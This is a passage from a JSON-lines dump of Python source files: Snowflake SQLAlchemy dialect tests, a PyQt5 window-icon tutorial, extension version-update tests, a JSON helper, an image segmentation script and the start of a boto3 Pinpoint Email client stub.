test_transaction(engine_testaccount, db_parameters):\n engine_testaccount.execute(text(\"\"\"\nCREATE TABLE {0} (c1 number)\"\"\".format(db_parameters['name'])))\n trans = engine_testaccount.connect().begin()\n try:\n engine_testaccount.execute(text(\"\"\"\nINSERT INTO {0} VALUES(123)\n \"\"\".format(db_parameters['name'])))\n trans.commit()\n engine_testaccount.execute(text(\"\"\"\nINSERT INTO {0} VALUES(456)\n \"\"\".format(db_parameters['name'])))\n trans.rollback()\n results = engine_testaccount.execute(\"\"\"\nSELECT * FROM {0}\n\"\"\".format(db_parameters['name'])).fetchall()\n assert results == [(123,)]\n finally:\n engine_testaccount.execute(text(\"\"\"\nDROP TABLE IF EXISTS {0}\n\"\"\".format(db_parameters['name'])))\n\n\ndef test_get_schemas(engine_testaccount):\n \"\"\"\n Tests get schemas from inspect.\n\n Although the method get_schema_names is not part of DefaultDialect,\n inspect() may call the method if exists.\n \"\"\"\n inspector = inspect(engine_testaccount)\n\n schemas = inspector.get_schema_names()\n assert 'information_schema' in schemas\n\n\ndef test_column_metadata(engine_testaccount):\n from sqlalchemy.ext.declarative import declarative_base\n\n Base = declarative_base()\n\n class Appointment(Base):\n __tablename__ = 'appointment'\n id = Column(Numeric(38, 3), primary_key=True)\n string_with_len = Column(String(100))\n binary_data = Column(LargeBinary)\n real_data = Column(REAL)\n\n Base.metadata.create_all(engine_testaccount)\n\n metadata = Base.metadata\n\n t = Table('appointment', metadata)\n\n inspector = inspect(engine_testaccount)\n inspector.reflecttable(t, None)\n assert str(t.columns['id'].type) == 'DECIMAL(38, 3)'\n assert str(t.columns['string_with_len'].type) == 'VARCHAR(100)'\n assert str(t.columns['binary_data'].type) == 'BINARY'\n assert str(t.columns['real_data'].type) == 'FLOAT'\n\n\ndef _get_engine_with_columm_metadata_cache(\n db_parameters, user=None, password=None, account=None):\n \"\"\"\n Creates a connection with column metadata cache\n \"\"\"\n if user is not None:\n db_parameters['user'] = user\n if password is not None:\n db_parameters['password'] = password\n if account is not None:\n db_parameters['account'] = account\n\n from sqlalchemy.pool import NullPool\n from sqlalchemy import create_engine\n from snowflake.sqlalchemy import URL\n engine = create_engine(URL(\n user=db_parameters['user'],\n password=db_parameters['password'],\n host=db_parameters['host'],\n port=db_parameters['port'],\n database=db_parameters['database'],\n schema=db_parameters['schema'],\n account=db_parameters['account'],\n protocol=db_parameters['protocol'],\n cache_column_metadata=True,\n ), poolclass=NullPool)\n\n return engine\n\n\ndef test_many_table_column_metadta(db_parameters):\n \"\"\"\n Get dozens of table metadata with column metadata cache.\n\n cache_column_metadata=True will cache all column metadata for all tables\n in the schema.\n \"\"\"\n engine = _get_engine_with_columm_metadata_cache(db_parameters)\n RE_SUFFIX_NUM = re.compile(r'.*(\\d+)$')\n metadata = MetaData()\n total_objects = 10\n for idx in range(total_objects):\n Table('mainusers' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name' + str(idx), String),\n Column('fullname', String),\n Column('password', String)\n )\n Table('mainaddresses' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('address_id_seq'),\n primary_key=True),\n Column('user_id' + str(idx), None,\n ForeignKey('mainusers' + str(idx) + '.id' + str(idx))),\n Column('email_address' + str(idx), String, nullable=False)\n )\n metadata.create_all(engine)\n\n inspector = inspect(engine)\n cnt = 0\n schema = inspector.default_schema_name\n for table_name in inspector.get_table_names(schema):\n m = RE_SUFFIX_NUM.match(table_name)\n if m:\n suffix = m.group(1)\n cs = inspector.get_columns(table_name, schema)\n if table_name.startswith(\"mainusers\"):\n assert len(cs) == 4\n assert cs[1]['name'] == 'name' + suffix\n cnt += 1\n elif table_name.startswith(\"mainaddresses\"):\n assert len(cs) == 3\n assert cs[2]['name'] == 'email_address' + suffix\n cnt += 1\n ps = inspector.get_pk_constraint(table_name, schema)\n if table_name.startswith(\"mainusers\"):\n assert ps['constrained_columns'] == ['id' + suffix]\n elif table_name.startswith(\"mainaddresses\"):\n assert ps['constrained_columns'] == ['id' + suffix]\n fs = inspector.get_foreign_keys(table_name, schema)\n if table_name.startswith(\"mainusers\"):\n assert len(fs) == 0\n elif table_name.startswith(\"mainaddresses\"):\n assert len(fs) == 1\n assert fs[0]['constrained_columns'] == ['user_id' + suffix]\n assert fs[0]['referred_table'] == 'mainusers' + suffix\n\n assert cnt == total_objects * 2, 'total number of test objects'\n\n\ndef test_cache_time(engine_testaccount, db_parameters):\n \"\"\"Check whether Inspector cache is working\"\"\"\n # Set up necessary tables\n metadata = MetaData()\n total_objects = 10\n for idx in range(total_objects):\n Table('mainusers' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name' + str(idx), String),\n Column('fullname', String),\n Column('password', String)\n )\n Table('mainaddresses' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('address_id_seq'),\n primary_key=True),\n Column('user_id' + str(idx), None,\n ForeignKey('mainusers' + str(idx) + '.id' + str(idx))),\n Column('email_address' + str(idx), String, nullable=False)\n )\n metadata.create_all(engine_testaccount)\n inspector = inspect(engine_testaccount)\n schema = db_parameters['schema']\n\n def harass_inspector():\n for table_name in inspector.get_table_names(schema):\n inspector.get_columns(table_name, schema)\n inspector.get_pk_constraint(table_name, schema)\n inspector.get_foreign_keys(table_name, schema)\n\n outcome = False\n # Allow up to 5 times for the speed test to pass to avoid flaky test\n for _ in range(5):\n # Python 2.7 has no timeit.timeit with globals and locals parameters\n s_time = time.time()\n harass_inspector()\n m_time = time.time()\n harass_inspector()\n time2 = time.time() - m_time\n time1 = m_time - s_time\n print(\"Ran inspector through tables twice, times:\\n\\tfirst: {0}\\n\\tsecond: {1}\".format(time1, time2))\n if time2 < time1 * 0.01:\n outcome = True\n break\n else:\n # Reset inspector to reset cache\n inspector = inspect(engine_testaccount)\n metadata.drop_all(engine_testaccount)\n assert outcome\n\n\n@pytest.mark.timeout(15)\ndef test_region():\n from sqlalchemy import create_engine\n engine = create_engine(URL(\n user='testuser',\n password='testpassword',\n account='testaccount',\n region='eu-central-1',\n login_timeout=5\n ))\n try:\n engine.execute('select current_version()').fetchone()\n pytest.fail('should not run')\n except Exception as ex:\n assert ex.orig.errno == 250001\n assert 'Failed to connect to DB' in ex.orig.msg\n assert 'testaccount.eu-central-1.snowflakecomputing.com' in ex.orig.msg\n\n\n@pytest.mark.timeout(15)\ndef test_azure():\n from sqlalchemy import create_engine\n engine = create_engine(URL(\n user='testuser',\n password='testpassword',\n account='testaccount',\n region='east-us-2.azure',\n login_timeout=5\n ))\n try:\n engine.execute('select current_version()').fetchone()\n pytest.fail('should not run')\n except Exception as ex:\n assert ex.orig.errno == 250001\n assert 'Failed to connect to DB' in ex.orig.msg\n assert 'testaccount.east-us-2.azure.snowflakecomputing.com' in \\\n ex.orig.msg\n\n\ndef test_load_dialect():\n \"\"\"\n Test loading Snowflake SQLAlchemy dialect class\n \"\"\"\n assert isinstance(dialects.registry.load('snowflake')(), dialect)\n\n\n@pytest.mark.parametrize('conditional_flag', [True, False])\n@pytest.mark.parametrize('update_flag,insert_flag,delete_flag', [\n (True, False, False),\n (False, True, False),\n (False, False, True),\n (False, True, True),\n (True, True, False)])\ndef test_upsert(engine_testaccount, update_flag, insert_flag, delete_flag, conditional_flag):\n meta = MetaData()\n users = Table('users', meta,\n Column('id', Integer, Sequence('user_id_seq'), primary_key=True),\n Column('name', String),\n Column('fullname', String))\n onboarding_users = Table('onboarding_users', meta,\n Column('id', Integer, Sequence('new_user_id_seq'), primary_key=True),\n Column('name', String),\n Column('fullname', String),\n Column('delete', Boolean))\n meta.create_all(engine_testaccount)\n conn = engine_testaccount.connect()\n try:\n conn.execute(users.insert(), [\n {'id': 1, 'name': 'mark', 'fullname': 'Mark Keller'},\n {'id': 4, 'name': 'luke', 'fullname': 'Luke Lorimer'},\n {'id': 2, 'name': 'amanda', 'fullname': 'Amanda Harris'}])\n conn.execute(onboarding_users.insert(), [\n {'id': 2, 'name': 'amanda', 'fullname': 'Amanda Charlotte Harris', 'delete': True},\n {'id': 3, 'name': 'jim', 'fullname': 'Jim Wang', 'delete': False},\n {'id': 4, 'name': 'lukas', 'fullname': 'Lukas Lorimer', 'delete': False},\n {'id': 5, 'name': 'andras', 'fullname': None, 'delete': False}\n ])\n\n merge = MergeInto(users, onboarding_users, users.c.id == onboarding_users.c.id)\n if update_flag:\n clause = merge.when_matched_then_update().values(name=onboarding_users.c.name,\n fullname=onboarding_users.c.fullname)\n if conditional_flag:\n clause.where(onboarding_users.c.name != 'amanda')\n if insert_flag:\n clause = merge.when_not_matched_then_insert().values(\n id=onboarding_users.c.id,\n name=onboarding_users.c.name,\n fullname=onboarding_users.c.fullname,\n )\n if conditional_flag:\n clause.where(onboarding_users.c.fullname != None) # NOQA\n if delete_flag:\n clause = merge.when_matched_then_delete()\n if conditional_flag:\n clause.where(onboarding_users.c.delete == True) # NOQA\n\n conn.execute(merge)\n users_tuples = {tuple(row) for row in conn.execute(select([users]))}\n onboarding_users_tuples = {tuple(row) for row in conn.execute(select([onboarding_users]))}\n expected_users = {\n (1, 'mark', 'Mark Keller'),\n (2, 'amanda', 'Amanda Harris'),\n (4, 'luke', 'Luke Lorimer')\n }\n if update_flag:\n if not conditional_flag:\n expected_users.remove((2, 'amanda', 'Amanda Harris'))\n expected_users.add((2, 'amanda', 'Amanda Charlotte Harris'))\n expected_users.remove((4, 'luke', 'Luke Lorimer'))\n expected_users.add((4, 'lukas', 'Lukas Lorimer'))\n elif delete_flag:\n if not conditional_flag:\n expected_users.remove((4, 'luke', 'Luke Lorimer'))\n expected_users.remove((2, 'amanda', 'Amanda Harris'))\n if insert_flag:\n if not conditional_flag:\n expected_users.add((5, 'andras', None))\n expected_users.add((3, 'jim', 'Jim Wang'))\n expected_onboarding_users = {\n (2, 'amanda', 'Amanda Charlotte Harris', True),\n (3, 'jim', 'Jim Wang', False),\n (4, 'lukas', 'Lukas Lorimer', False),\n (5, 'andras', None, False)\n }\n assert users_tuples == expected_users\n assert onboarding_users_tuples == expected_onboarding_users\n finally:\n conn.close()\n users.drop(engine_testaccount)\n onboarding_users.drop(engine_testaccount)\n\n\ndef test_deterministic_merge_into(sql_compiler):\n meta = MetaData()\n users = Table('users', meta,\n Column('id', Integer, Sequence('user_id_seq'), primary_key=True),\n Column('name', String),\n Column('fullname', String))\n onboarding_users = Table('onboarding_users', meta,\n Column('id', Integer, Sequence('new_user_id_seq'), primary_key=True),\n Column('name', String),\n Column('fullname', String),\n Column('delete', Boolean))\n merge = MergeInto(users, onboarding_users, users.c.id == onboarding_users.c.id)\n merge.when_matched_then_update().values(name=onboarding_users.c.name,\n fullname=onboarding_users.c.fullname)\n merge.when_not_matched_then_insert().values(\n id=onboarding_users.c.id,\n name=onboarding_users.c.name,\n fullname=onboarding_users.c.fullname,\n ).where(onboarding_users.c.fullname != None) # NOQA\n assert sql_compiler(merge) == \"MERGE INTO users USING onboarding_users ON users.id = onboarding_users.id \" \\\n \"WHEN MATCHED THEN UPDATE SET fullname = onboarding_users.fullname, \" \\\n \"name = onboarding_users.name WHEN NOT MATCHED AND onboarding_users.fullname \" \\\n \"IS NOT NULL THEN INSERT (fullname, id, name) VALUES (onboarding_users.fullname, \" \\\n \"onboarding_users.id, onboarding_users.name)\"\n\n\ndef test_comments(engine_testaccount):\n \"\"\"Tests strictly reading column comment through SQLAlchemy\"\"\"\n table_name = ''.join(random.choice(string.ascii_uppercase) for _ in range(5))\n try:\n engine_testaccount.execute(\"create table public.{} (\\\"col1\\\" text);\".format(table_name))\n engine_testaccount.execute(\"alter table public.{} alter \\\"col1\\\" comment 'this is my comment'\".format(table_name))\n engine_testaccount.execute(\"select comment from information_schema.columns where table_name='{}'\".format(table_name)).fetchall()\n inspector = inspect(engine_testaccount)\n columns = inspector.get_columns(table_name, schema='PUBLIC')\n assert columns[0].get('comment') == u'this is my comment'\n finally:\n engine_testaccount.execute(\"drop table public.{}\".format(table_name))\n\n\ndef test_comment_sqlalchemy(db_parameters, engine_testaccount, on_public_ci):\n \"\"\"Testing adding/reading column and table comments through SQLAlchemy\"\"\"\n new_schema = db_parameters['schema'] + '2'\n # Use same table name in 2 different schemas to make sure comment retrieval works properly\n table_name = ''.join(random.choice(string.ascii_uppercase) for _ in range(5))\n table_comment1 = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))\n column_comment1 = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))\n table_comment2 = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))\n column_comment2 = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))\n engine2, _ = get_engine(schema=new_schema)\n con2 = None\n if not on_public_ci:\n con2 = engine2.connect()\n con2.execute(\"CREATE SCHEMA IF NOT EXISTS {0}\".format(new_schema))\n inspector = inspect(engine_testaccount)\n metadata1 = MetaData()\n metadata2 = MetaData()\n mytable1 = Table(table_name,\n metadata1,\n Column(\"tstamp\", DateTime, comment=column_comment1),\n comment=table_comment1)\n mytable2 = Table(table_name,\n metadata2,\n Column(\"tstamp\", DateTime, comment=column_comment2),\n comment=table_comment2)\n\n metadata1.create_all(engine_testaccount, tables=[mytable1])\n if not on_public_ci:\n metadata2.create_all(engine2, tables=[mytable2])\n\n try:\n assert inspector.get_columns(table_name)[0]['comment'] == column_comment1\n assert inspector.get_table_comment(table_name)['text'] == table_comment1\n if not on_public_ci:\n assert inspector.get_columns(table_name, schema=new_schema)[0]['comment'] == column_comment2\n assert inspector.get_table_comment(\n table_name,\n schema=new_schema.upper() # Note: since did not quote schema name it was uppercase'd\n )['text'] == table_comment2\n finally:\n mytable1.drop(engine_testaccount)\n if not on_public_ci:\n mytable2.drop(engine2)\n con2.execute(\"DROP SCHEMA IF EXISTS {0}\".format(new_schema))\n con2.close()\n engine2.dispose()\n\n\ndef test_special_schema_character(db_parameters, on_public_ci):\n \"\"\"Make sure we decode special characters correctly\"\"\"\n if on_public_ci:\n pytest.skip(\"Public CIs cannot create Schemas and Databases\")\n # Constants\n database = \"a/b/c\" # \"'/'.join([choice(ascii_lowercase) for _ in range(3)])\n schema = \"d/e/f\" # '/'.join([choice(ascii_lowercase) for _ in range(3)])\n # Setup\n options = dict(**db_parameters)\n conn = connect(**options)\n conn.cursor().execute(\"CREATE OR REPLACE DATABASE \\\"{0}\\\"\".format(database))\n conn.cursor().execute(\"CREATE OR REPLACE SCHEMA \\\"{0}\\\"\".format(schema))\n conn.close()\n # Test\n options.update({'database': '\"' + database + '\"',\n 'schema': '\"' + schema + '\"'})\n sf_conn = connect(**options)\n sf_connection = [res for res in sf_conn.cursor().execute(\"select current_database(), \"\n \"current_schema();\")]\n sa_conn = create_engine(URL(**options)).connect()\n sa_connection = [res for res in sa_conn.execute(\"select current_database(), \"\n \"current_schema();\")]\n sa_conn.close()\n sf_conn.close()\n # Teardown\n conn = connect(**options)\n conn.cursor().execute(\"DROP DATABASE IF EXISTS \\\"{0}\\\"\".format(database))\n conn.close()\n assert [(database, schema)] == sf_connection == sa_connection\n\n\ndef test_autoincrement(engine_testaccount):\n metadata = MetaData()\n users = Table('users', metadata,\n Column('uid', Integer, Sequence('id_seq'), primary_key=True),\n Column('name', String(39)))\n\n try:\n users.create(engine_testaccount)\n\n connection = engine_testaccount.connect()\n connection.execute(users.insert(), [{'name': 'sf1'}])\n\n assert connection.execute(select([users])).fetchall() == [\n (1, 'sf1')\n ]\n\n connection.execute(users.insert(), {'name': 'sf2'}, {'name': 'sf3'})\n assert connection.execute(select([users])).fetchall() == [\n (1, 'sf1'),\n (2, 'sf2'),\n (3, 'sf3')\n ]\n\n connection.execute(users.insert(), {'name': 'sf4'})\n assert connection.execute(select([users])).fetchall() == [\n (1, 'sf1'),\n (2, 'sf2'),\n (3, 'sf3'),\n (4, 'sf4')\n ]\n\n seq = Sequence('id_seq')\n nextid = connection.execute(seq)\n connection.execute(users.insert(), [{'uid': nextid, 'name': 'sf5'}])\n assert connection.execute(select([users])).fetchall() == [\n (1, 'sf1'),\n (2, 'sf2'),\n (3, 'sf3'),\n (4, 'sf4'),\n (5, 'sf5')\n ]\n finally:\n users.drop(engine_testaccount)\n\n\ndef test_get_too_many_columns(engine_testaccount, db_parameters):\n \"\"\"Check whether Inspector cache is working, when there are too many column to cache whole schema's columns\"\"\"\n # Set up necessary tables\n metadata = MetaData()\n total_objects = 10\n for idx in range(total_objects):\n Table('mainuserss' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name' + str(idx), String),\n Column('fullname', String),\n Column('password', String)\n )\n Table('mainaddressess' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('address_id_seq'),\n primary_key=True),\n Column('user_id' + str(idx), None,\n ForeignKey('mainuserss' + str(idx) + '.id' + str(idx))),\n Column('email_address' + str(idx), String, nullable=False)\n )\n metadata.create_all(engine_testaccount)\n inspector = inspect(engine_testaccount)\n schema = db_parameters['schema']\n\n # Emulate error\n with patch.object(inspector.dialect, '_get_schema_columns', return_value=None) as mock_method:\n def harass_inspector():\n for table_name in inspector.get_table_names(schema):\n column_metadata = inspector.get_columns(table_name, schema)\n inspector.get_pk_constraint(table_name, schema)\n inspector.get_foreign_keys(table_name, schema)\n assert 3 <= len(column_metadata) <= 4 # Either one of the tables should have 3 or 4 columns\n\n outcome = False\n # Allow up to 5 times for the speed test to pass to avoid flaky test\n for _ in range(5):\n # Python 2.7 has no timeit.timeit with globals and locals parameters\n s_time = time.time()\n harass_inspector()\n m_time = time.time()\n harass_inspector()\n time2 = time.time() - m_time\n time1 = m_time - s_time\n print(\"Ran inspector through tables twice, times:\\n\\tfirst: {0}\\n\\tsecond: {1}\".format(time1, time2))\n if time2 < time1 * 0.01:\n outcome = True\n break\n else:\n # Reset inspector to reset cache\n inspector = inspect(engine_testaccount)\n metadata.drop_all(engine_testaccount)\n assert mock_method.call_count > 0 # Make sure we actually mocked the issue happening\n assert outcome\n\n\ndef test_too_many_columns_detection(engine_testaccount, db_parameters):\n \"\"\"This tests whether a too many column error actually triggers the more granular table version\"\"\"\n # Set up a single table\n metadata = MetaData()\n Table('users', metadata,\n Column('id', Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name', String),\n Column('fullname', String),\n Column('password', String)\n )\n metadata.create_all(engine_testaccount)\n inspector = inspect(engine_testaccount)\n # Do test\n original_execute = inspector.bind.execute\n\n def mock_helper(command, *args, **kwargs):\n if '_get_schema_columns' in command:\n raise ProgrammingError(\"Information schema query returned too much data. Please repeat query with more \"\n \"selective predicates.\", 90030)\n else:\n return original_execute(command, *args, **kwargs)\n\n with patch.object(inspector.bind, 'execute', side_effect=mock_helper):\n column_metadata = inspector.get_columns('users', db_parameters['schema'])\n assert len(column_metadata) == 4\n # Clean up\n metadata.drop_all(engine_testaccount)\n\n\ndef test_empty_comments(engine_testaccount):\n \"\"\"Test that no comment returns None\"\"\"\n table_name = ''.join(random.choice(string.ascii_uppercase) for _ in range(5))\n try:\n engine_testaccount.execute(\"create table public.{} (\\\"col1\\\" text);\".format(table_name))\n engine_testaccount.execute(\"select comment from information_schema.columns where table_name='{}'\".format(table_name)).fetchall()\n inspector = inspect(engine_testaccount)\n columns = inspector.get_columns(table_name, schema='PUBLIC')\n assert inspector.get_table_comment(table_name, schema='PUBLIC') == {'text': None}\n assert all([c['comment'] is None for c in columns])\n finally:\n engine_testaccount.execute(\"drop table public.{}\".format(table_name))\n"} {"ext": "py", "sha": "1a2fd9b881bcb20c6a7d72e836aff2941ba30a0c", "content": "\"\"\"\r\nZetCode PyQt5 tutorial \r\n\r\nThis example shows an icon\r\nin the titlebar of the window.\r\n\r\nAuthor: Jan Bodnar\r\nWebsite: zetcode.com \r\nLast edited: August 2017\r\n\"\"\"\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget\r\nfrom PyQt5.QtGui import QIcon\r\n\r\n\r\nclass Example(QWidget):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n\r\n self.initUI()\r\n\r\n\r\n def initUI(self):\r\n\r\n self.setGeometry(300, 300, 300, 220)\r\n self.setWindowTitle('Icon')\r\n self.setWindowIcon(QIcon('web.png')) \r\n\r\n self.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n sys.exit(app.exec_())"} {"ext": "py", "sha": "1a2fdb0ecb858371470a0abd13011cb82b8f8dc1", "content": "# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License.\n\nimport json\n\nimport freezegun\nimport pytest\nimport update_ext_version\n\nTEST_DATETIME = \"2022-03-14 01:23:45\"\n\n# The build ID is calculated via:\n# \"1\" + datetime.datetime.strptime(TEST_DATETIME,\"%Y-%m-%d %H:%M:%S\").strftime('%j%H%M')\nEXPECTED_BUILD_ID = \"10730123\"\n\n\ndef create_package_json(directory, version):\n \"\"\"Create `package.json` in `directory` with a specified version of `version`.\"\"\"\n package_json = directory / \"package.json\"\n package_json.write_text(json.dumps({\"version\": version}), encoding=\"utf-8\")\n return package_json\n\n\ndef run_test(tmp_path, version, args, expected):\n package_json = create_package_json(tmp_path, version)\n update_ext_version.main(package_json, args)\n package = json.loads(package_json.read_text(encoding=\"utf-8\"))\n assert expected == update_ext_version.parse_version(package[\"version\"])\n\n\n@pytest.mark.parametrize(\n \"version, args\",\n [\n (\"1.0.0-rc\", []),\n (\"1.1.0-rc\", [\"--release\"]),\n (\"1.0.0-rc\", [\"--release\", \"--build-id\", \"-1\"]),\n (\"1.0.0-rc\", [\"--release\", \"--for-publishing\", \"--build-id\", \"-1\"]),\n (\"1.0.0-rc\", [\"--release\", \"--for-publishing\", \"--build-id\", \"999999999999\"]),\n (\"1.1.0-rc\", [\"--build-id\", \"-1\"]),\n (\"1.1.0-rc\", [\"--for-publishing\", \"--build-id\", \"-1\"]),\n (\"1.1.0-rc\", [\"--for-publishing\", \"--build-id\", \"999999999999\"]),\n ],\n)\ndef test_invalid_args(tmp_path, version, args):\n with pytest.raises(ValueError):\n run_test(tmp_path, version, args, None)\n\n\n@pytest.mark.parametrize(\n \"version, args, expected\",\n [\n (\"1.1.0-rc\", [\"--build-id\", \"12345\"], (\"1\", \"1\", \"12345\", \"rc\")),\n (\"1.0.0-rc\", [\"--release\", \"--build-id\", \"12345\"], (\"1\", \"0\", \"12345\", \"\")),\n (\n \"1.1.0-rc\",\n [\"--for-publishing\", \"--build-id\", \"12345\"],\n (\"1\", \"1\", \"12345\", \"\"),\n ),\n (\n \"1.0.0-rc\",\n [\"--release\", \"--for-publishing\", \"--build-id\", \"12345\"],\n (\"1\", \"0\", \"12345\", \"\"),\n ),\n (\n \"1.0.0-rc\",\n [\"--release\", \"--build-id\", \"999999999999\"],\n (\"1\", \"0\", \"999999999999\", \"\"),\n ),\n (\n \"1.1.0-rc\",\n [\"--build-id\", \"999999999999\"],\n (\"1\", \"1\", \"999999999999\", \"rc\"),\n ),\n (\"1.1.0-rc\", [], (\"1\", \"1\", EXPECTED_BUILD_ID, \"rc\")),\n (\n \"1.0.0-rc\",\n [\"--release\"],\n (\"1\", \"0\", \"0\", \"\"),\n ),\n (\n \"1.1.0-rc\",\n [\"--for-publishing\"],\n (\"1\", \"1\", EXPECTED_BUILD_ID, \"\"),\n ),\n (\n \"1.0.0-rc\",\n [\"--release\", \"--for-publishing\"],\n (\"1\", \"0\", \"0\", \"\"),\n ),\n (\n \"1.0.0-rc\",\n [\"--release\"],\n (\"1\", \"0\", \"0\", \"\"),\n ),\n (\n \"1.1.0-rc\",\n [],\n (\"1\", \"1\", EXPECTED_BUILD_ID, \"rc\"),\n ),\n ],\n)\n@freezegun.freeze_time(\"2022-03-14 01:23:45\")\ndef test_update_ext_version(tmp_path, version, args, expected):\n run_test(tmp_path, version, args, expected)\n"} {"ext": "py", "sha": "1a2fdb91f2a3778bbd6edcb216c365f3b450590c", "content": "import simplejson as json \nfrom collections import namedtuple\n\ndef json2obj(data):\n return json.loads(data, object_hook=_json_object_hook)\n\ndef _json_object_hook(dobj):\n dobj['json_dict'] = dobj.copy()\n X = namedtuple('X', dobj.keys(), rename=True)\n X.remove = lambda x: None\n return(X(*dobj.values()))\n"} {"ext": "py", "sha": "1a2fdccfb072d8e8a94167ef8fee28278425beb9", "content": "from core.project.project import Project\nfrom core.graph.region_chunk import RegionChunk\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom skimage.segmentation import random_walker\nfrom skimage.data import binary_blobs\nimport skimage\n\nif __name__ == '__main__':\n p = Project()\n p.load('/Users/flipajs/Documents/wd/FERDA/Cam1_')\n\n ch = p.chm[257]\n\n rch = RegionChunk(ch, p.gm, p.rm)\n start_vertex = ch.start_vertex()\n\n in_regions = []\n for n in start_vertex.in_neighbors():\n r = p.gm.region(n)\n in_regions.append(r)\n\n r = rch[0]\n r.frame()\n\n from utils.video_manager import get_auto_video_manager\n from skimage.morphology import skeletonize_3d\n import cv2\n\n vm = get_auto_video_manager(p)\n\n # TODO: idea - label erosion before each nex iteration...\n from scipy.ndimage.morphology import binary_erosion\n\n whole_labels = None\n for r1 in rch.regions_gen():\n markers = np.zeros((1000, 1000), dtype=np.int32)\n r1_im = np.zeros((1000, 1000), dtype=np.bool)\n r1_im[r1.pts()[:, 0], r1.pts()[:, 1]] = True\n markers[np.logical_not(r1_im)] = -1\n\n img = vm.get_frame(r1.frame())\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n for i, r in enumerate(in_regions):\n if whole_labels is None:\n im2 = np.zeros((1000, 1000), dtype=np.bool)\n im2[r.pts()[:, 0], r.pts()[:, 1]] = True\n\n markers[np.logical_and(r1_im, im2)] = i+1\n else:\n l_ = whole_labels==i+1\n l_ = binary_erosion(l_, iterations=5)\n markers[np.logical_and(r1_im, l_)] = i+1\n\n tl = r1.roi().top_left_corner()\n br = r1.roi().bottom_right_corner()\n gray = gray[tl[0]:br[0], tl[1]:br[1]].copy()\n markers = markers[tl[0]:br[0], tl[1]:br[1]].copy()\n r1_im = r1_im[tl[0]:br[0], tl[1]:br[1]].copy()\n skel = skeletonize_3d(r1_im)\n\n data=np.asarray(r1_im, dtype=np.uint8)*255\n labels = random_walker(gray, markers, beta=500000, mode='bf')\n\n whole_labels = np.zeros((1000, 1000), dtype=np.int32)\n whole_labels[tl[0]:br[0], tl[1]:br[1]] = labels.copy()\n\n # Plot results\n fig, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, figsize=(8, 3.2), sharex=True, sharey=True)\n ax1.imshow(gray, cmap='gray', interpolation='nearest')\n ax1.axis('off')\n ax1.set_adjustable('box-forced')\n ax1.set_title('Noisy data')\n ax2.imshow(markers, cmap='hot', interpolation='nearest')\n ax2.axis('off')\n ax2.set_adjustable('box-forced')\n ax2.set_title('Markers')\n ax3.imshow(labels, cmap='hot', interpolation='nearest')\n ax3.axis('off')\n ax3.set_adjustable('box-forced')\n ax3.set_title('Segmentation')\n ax4.imshow(skel)\n ax4.axis('off')\n ax4.set_adjustable('box-forced')\n ax4.set_title('skeleton')\n\n\n fig.subplots_adjust(hspace=0.01, wspace=0.01, top=1, bottom=0, left=0,\n right=1)\n plt.show()\n plt.ion()\n plt.waitforbuttonpress()\n plt.close()\n\n\n\n\n"} {"ext": "py", "sha": "1a2fdcd2a8cab6de6db5933a0757a8beb063ac74", "content": "from typing import Optional\nfrom botocore.client import BaseClient\nfrom typing import Dict\nfrom botocore.paginate import Paginator\nfrom datetime import datetime\nfrom botocore.waiter import Waiter\nfrom typing import Union\nfrom typing import List\n\n\nclass Client(BaseClient):\n def can_paginate(self, operation_name: str = None):\n \"\"\"\n Check if an operation can be paginated.\n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is ``create_foo``, and you\\'d normally invoke the\n operation as ``client.create_foo(**kwargs)``, if the\n ``create_foo`` operation can be paginated, you can use the\n call ``client.get_paginator(\\\"create_foo\\\")``.\n :return: ``True`` if the operation can be paginated,\n ``False`` otherwise.\n \"\"\"\n pass\n\n def create_configuration_set(self, ConfigurationSetName: str = None, TrackingOptions: Dict = None, DeliveryOptions: Dict = None, ReputationOptions: Dict = None, SendingOptions: Dict = None, Tags: List = None) -> Dict:\n \"\"\"\n Create a configuration set. *Configuration sets* are groups of rules that you can apply to the emails you send using Amazon Pinpoint. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email. \n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_configuration_set(\n ConfigurationSetName='string',\n TrackingOptions={\n 'CustomRedirectDomain': 'string'\n },\n DeliveryOptions={\n 'SendingPoolName': 'string'\n },\n ReputationOptions={\n 'ReputationMetricsEnabled': True|False,\n 'LastFreshStart': datetime(2015, 1, 1)\n },\n SendingOptions={\n 'SendingEnabled': True|False\n },\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName:\n The name of the configuration set.\n :type TrackingOptions: dict\n :param TrackingOptions:\n An object that defines the open and click tracking options for emails that you send using the configuration set.\n - **CustomRedirectDomain** *(string) --* **[REQUIRED]**\n The domain that you want to use for tracking open and click events.\n :type DeliveryOptions: dict\n :param DeliveryOptions:\n An object that defines the dedicated IP pool that is used to send emails that you send using the configuration set.\n - **SendingPoolName** *(string) --*\n The name of the dedicated IP pool that you want to associate with the configuration set.\n :type ReputationOptions: dict\n :param ReputationOptions:\n An object that defines whether or not Amazon Pinpoint collects reputation metrics for the emails that 